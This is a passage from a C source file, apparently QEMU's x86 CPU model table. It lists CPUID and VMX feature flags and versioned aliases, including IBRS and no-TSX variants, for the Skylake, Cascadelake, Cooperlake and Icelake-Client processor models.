CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, /* Missing: Mode-based execute control (XS/XU), processor tracing, TSC scaling */ .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .features[FEAT_VMX_VMFUNC] = MSR_VMX_VMFUNC_EPT_SWITCHING, .xlevel = 0x80000008, .model_id = "Intel Core Processor (Skylake)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Skylake-Client-IBRS", .props = (PropValue[]) { { "spec-ctrl", "on" }, { "model-id", "Intel Core Processor (Skylake, IBRS)" }, { NULL /* end of list */ } } }, { .version = 3, .alias = "Skylake-Client-noTSX-IBRS", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, { "model-id", "Intel Core Processor (Skylake, IBRS, no TSX)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "Skylake-Server", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 85, .stepping = 4, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLWB | CPUID_7_0_EBX_AVX512F | CPUID_7_0_EBX_AVX512DQ | CPUID_7_0_EBX_AVX512BW | CPUID_7_0_EBX_AVX512CD | CPUID_7_0_EBX_AVX512VL | CPUID_7_0_EBX_CLFLUSHOPT, .features[FEAT_7_0_ECX] = CPUID_7_0_ECX_PKU, /* Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. */ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, /* Missing: Mode-based execute control (XS/XU), processor tracing, TSC scaling */ .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .xlevel = 0x80000008, .model_id = "Intel Xeon Processor (Skylake)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Skylake-Server-IBRS", .props = (PropValue[]) { /* clflushopt was not added to Skylake-Server-IBRS */ /* TODO: add -v3 including clflushopt */ { "clflushopt", "off" }, { "spec-ctrl", "on" }, { "model-id", "Intel Xeon Processor (Skylake, IBRS)" }, { NULL /* end of list */ } } }, { .version = 3, .alias = "Skylake-Server-noTSX-IBRS", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, { "model-id", "Intel Xeon Processor (Skylake, IBRS, no TSX)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "Cascadelake-Server", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 85, .stepping = 6, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLWB | CPUID_7_0_EBX_AVX512F | CPUID_7_0_EBX_AVX512DQ | CPUID_7_0_EBX_AVX512BW | CPUID_7_0_EBX_AVX512CD | CPUID_7_0_EBX_AVX512VL | CPUID_7_0_EBX_CLFLUSHOPT, .features[FEAT_7_0_ECX] = CPUID_7_0_ECX_PKU | CPUID_7_0_ECX_AVX512VNNI, .features[FEAT_7_0_EDX] = CPUID_7_0_EDX_SPEC_CTRL | CPUID_7_0_EDX_SPEC_CTRL_SSBD, /* Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. */ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, /* Missing: Mode-based execute control (XS/XU), processor tracing, TSC scaling */ .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .xlevel = 0x80000008, .model_id = "Intel Xeon Processor (Cascadelake)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .props = (PropValue[]) { { "arch-capabilities", "on" }, { "rdctl-no", "on" }, { "ibrs-all", "on" }, { "skip-l1dfl-vmentry", "on" }, { "mds-no", "on" }, { NULL /* end of list */ } }, }, { .version = 3, .alias = "Cascadelake-Server-noTSX", .props = (PropValue[]) { { "hle", "off" }, { "rtm", "off" }, { NULL /* end of list */ } }, }, { 0 /* end of list */ } } }, { .name = "Cooperlake", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 85, .stepping = 10, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP | CPUID_7_0_EBX_CLWB | CPUID_7_0_EBX_AVX512F | CPUID_7_0_EBX_AVX512DQ | CPUID_7_0_EBX_AVX512BW | CPUID_7_0_EBX_AVX512CD | CPUID_7_0_EBX_AVX512VL | CPUID_7_0_EBX_CLFLUSHOPT, .features[FEAT_7_0_ECX] = CPUID_7_0_ECX_PKU | CPUID_7_0_ECX_AVX512VNNI, .features[FEAT_7_0_EDX] = CPUID_7_0_EDX_SPEC_CTRL | CPUID_7_0_EDX_STIBP | CPUID_7_0_EDX_SPEC_CTRL_SSBD | CPUID_7_0_EDX_ARCH_CAPABILITIES, .features[FEAT_ARCH_CAPABILITIES] = MSR_ARCH_CAP_RDCL_NO | MSR_ARCH_CAP_IBRS_ALL | MSR_ARCH_CAP_SKIP_L1DFL_VMENTRY | MSR_ARCH_CAP_MDS_NO | MSR_ARCH_CAP_PSCHANGE_MC_NO | MSR_ARCH_CAP_TAA_NO, .features[FEAT_7_1_EAX] = CPUID_7_1_EAX_AVX512_BF16, /* * Missing: XSAVES (not supported by some Linux versions, * including v4.1 to v4.12). * KVM doesn't yet expose any XSAVES state save component, * and the only one defined in Skylake (processor tracing) * probably will block migration anyway. */ .features[FEAT_XSAVE] = CPUID_XSAVE_XSAVEOPT | CPUID_XSAVE_XSAVEC | CPUID_XSAVE_XGETBV1, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, /* Missing: Mode-based execute control (XS/XU), processor tracing, TSC scaling */ .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS | MSR_VMX_EPT_AD_BITS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT | MSR_VMX_MISC_STORE_LMA | MSR_VMX_MISC_VMWRITE_VMEXIT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER | VMX_PIN_BASED_POSTED_INTR, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID | VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST | VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT | VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY | VMX_SECONDARY_EXEC_RDRAND_EXITING | VMX_SECONDARY_EXEC_ENABLE_INVPCID | VMX_SECONDARY_EXEC_ENABLE_VMFUNC | VMX_SECONDARY_EXEC_SHADOW_VMCS | VMX_SECONDARY_EXEC_RDSEED_EXITING | VMX_SECONDARY_EXEC_ENABLE_PML, .features[FEAT_VMX_VMFUNC] = MSR_VMX_VMFUNC_EPT_SWITCHING, .xlevel = 0x80000008, .model_id = "Intel Xeon Processor (Cooperlake)", }, { .name = "Icelake-Client", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 126, .stepping = 0, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AVX | CPUID_EXT_XSAVE | CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_X2APIC | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3 | CPUID_EXT_TSC_DEADLINE_TIMER | CPUID_EXT_FMA | CPUID_EXT_MOVBE | CPUID_EXT_PCID | CPUID_EXT_F16C | CPUID_EXT_RDRAND, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_RDTSCP | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_ABM | CPUID_EXT3_LAHF_LM | CPUID_EXT3_3DNOWPREFETCH, .features[FEAT_8000_0008_EBX] = CPUID_8000_0008_EBX_WBNOINVD, .features[FEAT_7_0_EBX] = CPUID_7_0_EBX_FSGSBASE | CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_HLE | CPUID_7_0_EBX_AVX2 | CPUID_7_0_EBX_SMEP | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ERMS | CPUID_7_0_EBX_INVPCID | CPUID_7_0_EBX_RTM | CPUID_7_0_EBX_RDSEED | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP, 